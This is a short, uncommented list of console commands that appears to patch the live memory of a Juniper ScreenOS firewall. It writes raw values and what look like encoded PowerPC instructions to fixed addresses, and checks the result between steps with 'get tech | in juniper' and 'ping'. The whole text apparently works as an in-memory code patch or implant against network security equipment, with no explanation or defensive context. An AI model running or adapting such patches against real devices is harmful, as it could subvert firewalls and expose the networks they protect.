set mem addr 0x195c2e0 0x000636f0
ping
set mem addr 0x1a7cc28 0x4d333241
set mem addr 0x1a7cc2c 0x3331432c
set mem addr 0x1a7cc30 0x3031653a
set mem addr 0x1a7cc34 0x33443230
set mem addr 0x1a7cc38 0x30303334
set mem addr 0x1a7cc3c 0x33383630
set mem addr 0x1a7cc40 0x34383030
set mem addr 0x1a7cc44 0x62303639
set mem addr 0x1a7cc48 0x32633434
set mem addr 0x1a7cc4c 0x33643230
set mem addr 0x1a7cc50 0x30303639
set mem addr 0x1a7cc54 0x36313239
set mem addr 0x1a7cc58 0x61666130
set mem addr 0x1a7cc5c 0x37643238
set mem addr 0x1a7cc60 0x30336136
set mem addr 0x1a7cc64 0x34653830
set mem addr 0x1a7cc68 0x30303230
set mem addr 0x1a7cc6c 0x00000000
set mem addr 0x195c2e0 0x0032a168
get tech | in juniper
ping
set mem addr 0x636d0 0x60630300
set mem addr 0x195c2e0 0x000636f0
get tech | in juniper
ping
set mem addr 0x342304 0x48000014
set mem addr 0x195c2e0 0x006446a8
